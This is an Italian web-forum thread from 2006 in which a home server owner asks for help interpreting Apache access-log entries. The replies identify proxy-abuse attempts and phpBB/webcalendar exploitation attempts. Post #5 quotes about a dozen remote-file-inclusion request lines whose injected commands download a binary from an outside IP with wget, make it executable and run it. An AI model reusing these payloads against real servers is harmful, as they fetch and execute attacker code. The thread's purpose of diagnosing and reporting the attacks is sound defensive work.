|
|||||||
|
|
|
 |
|
|
Strumenti |
17-03-2006, 10:04
|
#1 |
|
Senior Member
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
|
[apache] analisi log access
spero di non aver toppato sezione
 "analizzando" i log del mio pseudo-server apache ho trovato un paio di righe che mi hanno lasciato un po perplesso, dalle ricerche fatte con san google, credo di aver capito che ci è stato qualcuno che ha tentato di "scannerizzare" il mio server alla ricerca di un proxy da usare..... ma il dubbio piu grande, sono i numeri in fondo alla riga 200 e 19 il 200 sembra che stia per un "OK" ma il 19? qui vi posto la riga: ****** - - [16/Mar/2006:14:45:14 +0100] "POST http://******:6667/ HTTP/1.0" 200 19 ****** - - [16/Mar/2006:14:45:14 +0100] "CONNECT ******:6667 HTTP/1.0" 200 19 intanto gli ip li ho nascosti, ma dal ping risulta essere un server irc.... quello che vi chiedo è questo: 1. un link o manuale in cui venga spiegato i numeri finali delle righe (200... 19 ... 404 (pagina non trovata credo) etc etc..) 2. in particolare, il 200 e il 19 finale cosa significano? 3. mi devo preoccupare? P.S.: sul mio server non è installato nessun proxy server grazie samu
__________________
<<giovani oggi bagnati, domani forse raffreddati....>> Papa Giovanni Paolo II - Aprile 1995 Trento Concluso positivamente con: 055, giankyfava, iceone, carocavallo |
|
|
|
17-03-2006, 11:16
|
#2 |
|
Senior Member
Iscritto dal: Mar 2004
Città: Rimini
Messaggi: 10296
|
Ciao,
forse hai maggiori possibilità di ottenere risposte nella sezione "programmazione" dove hanno più confidenza con Apache et similia 
__________________
sometimes they come back *** Life Happens! - (Professionista I.T. - Tecnico Telecomunicazioni) Latitude E6420 I7 2760QM SSD Crucial M4-512GB --- Tecra R840 I5 2520M SSD Samsung 830-256GB --- Macbook Pro 13,3" I5 2435M SSD Samsung 830-256GB |
|
|
|
|
17-03-2006, 12:29
|
#3 | |
|
Senior Member
Iscritto dal: Apr 2000
Città: Vicino a Montecatini(Pistoia) Moto:Kawasaki Ninja ZX-9R Scudetti: 29
Messaggi: 53971
|
Quote:
Nota che la porta 6667 è quella standard dei server irc... |
|
|
|
|
|
17-03-2006, 13:48
|
#4 |
|
Senior Member
Iscritto dal: Feb 2003
Città: Formia
Messaggi: 1545
|
guardano i file di log del mio apache invece trovo molte richieste sulle seguenti porte
6995 (tantissime) 330 518 chie vuol dire? |
|
|
|
|
17-03-2006, 13:57
|
#5 |
|
Senior Member
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
|
@cionci
ho fatto quel che hai detto, connessione rifiutata @wgator ti mando un pm, una cosa che ho notato nei log @tutti gli altri ho questa fila di log, sembra che qualcuno voglia bucarmi (o lo ha già fatto )213.191.133.20 - - [17/Mar/2006:12:01:45 +0100] "GET /webcalendar/tools/send_reminders.php?includedir=http:// 83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTT P/1.1" 404 317 213.191.133.20 - - [17/Mar/2006:12:01:47 +0100] "GET /webcalendar/send_reminders.php?includedir=http://83.16. 187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 311 213.191.133.20 - - [17/Mar/2006:12:01:48 +0100] "GET /webcalendar/tools/send_reminders.phpsend_reminders.php? includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;ech o%20YYY;echo| HTTP/1.1" 404 335 213.191.133.20 - - [17/Mar/2006:12:01:49 +0100] "GET /modules/PNphpBB2/includes/functions_admin.phpfunctions_ admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20ha ita;./haita;echo%20YYY;echo| HTTP/1.1" 404 345 213.191.133.20 - - [17/Mar/2006:12:01:50 +0100] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_roo t_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20 YYY;echo| HTTP/1.1" 404 326 213.191.133.20 - - [17/Mar/2006:12:01:51 +0100] "GET /modules/includes/functions_admin.php?phpbb_root_path=ht tp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 317 213.191.133.20 - - [17/Mar/2006:12:01:52 +0100] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=h ttp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo | HTTP/1.1" 404 318 213.191.133.20 - - [17/Mar/2006:12:01:54 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=h ttp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo | HTTP/1.1" 404 318 213.191.133.20 - - [17/Mar/2006:12:01:55 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83 .16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/ 1.1" 404 310 213.191.133.20 - - [17/Mar/2006:12:01:56 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83 .16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/ 1.1" 404 310 213.191.133.20 - - [17/Mar/2006:12:01:57 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.18 7.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 4 04 304 che ne dite? questa volta ho lasciato gli ip... ho un forum per quello installato, ma non è phpbb infatti, l'errore 404 dato dai log significa che non han trovato na mazza sul mio server o no?
__________________
<<giovani oggi bagnati, domani forse raffreddati....>> Papa Giovanni Paolo II - Aprile 1995 Trento Concluso positivamente con: 055, giankyfava, iceone, carocavallo Ultima modifica di samu76 : 17-03-2006 alle 14:17. |
|
|
|
|
17-03-2006, 14:05
|
#6 |
|
Senior Member
Iscritto dal: Feb 2003
Città: Formia
Messaggi: 1545
|
analizzando meglio il log ho trovato anche
CONNECT XXXXXXXXXXXX:25 HTTP/1.0" 500 663 questo secondo voi potrebbe essere un tentativo di attacco. |
|
|
|
|
17-03-2006, 14:27
|
#7 |
|
Senior Member
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
|
leggendo meglio i log sembra che volevano usarmi per accedere ad altro server...
non mi sembra che ci siano riusciti, anche perchè le cose che cercavano, io non le ho installate (non tutte almeno, e cmq non con un nome che hanno usato)
__________________
<<giovani oggi bagnati, domani forse raffreddati....>> Papa Giovanni Paolo II - Aprile 1995 Trento Concluso positivamente con: 055, giankyfava, iceone, carocavallo |
|
|
|
|
17-03-2006, 14:39
|
#8 | |
|
Senior Member
Iscritto dal: Jan 2001
Città: Milano
Messaggi: 5707
|
Quote:
esatto. stava cercando di sfruttare qualche vulnerabilità di phpbb. |
|
|
|
|
|
17-03-2006, 15:01
|
#9 |
|
Senior Member
Iscritto dal: Apr 2000
Città: Vicino a Montecatini(Pistoia) Moto:Kawasaki Ninja ZX-9R Scudetti: 29
Messaggi: 53971
|
Sì, quello era un tentativo di usarti per scaricare qualcosa...ma non ci sono riusciti...
|
|
|
|
|
17-03-2006, 16:11
|
#10 |
|
Senior Member
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
|
è sempre utile avere un web server vuoto
scherzo, lo è in parte cmq, ancora non riesco a capire i due log che ho postato nel primo messaggio... in rete non trovo nulla 
__________________
<<giovani oggi bagnati, domani forse raffreddati....>> Papa Giovanni Paolo II - Aprile 1995 Trento Concluso positivamente con: 055, giankyfava, iceone, carocavallo |
|
|
|
|
18-03-2006, 11:48
|
#11 |
|
Senior Member
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
|
mi sa che sono stato preso di mira da qualche lamer uff
intanto ho scitto ai 2 isp (asiatici entrambi) servizio abusi, spero che risolvano o che invitino i clienti a controllare i loro log ogni tanto e di prendere le dovute precauzioni... ho pure scritto ad un terzo (tedesco) sembra che un network scanner cercasse vulnerabilità ecco parte del log andato male cmq w00tw00t.at.ISC.SANS.DFind:
__________________
<<giovani oggi bagnati, domani forse raffreddati....>> Papa Giovanni Paolo II - Aprile 1995 Trento Concluso positivamente con: 055, giankyfava, iceone, carocavallo |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 00:08.
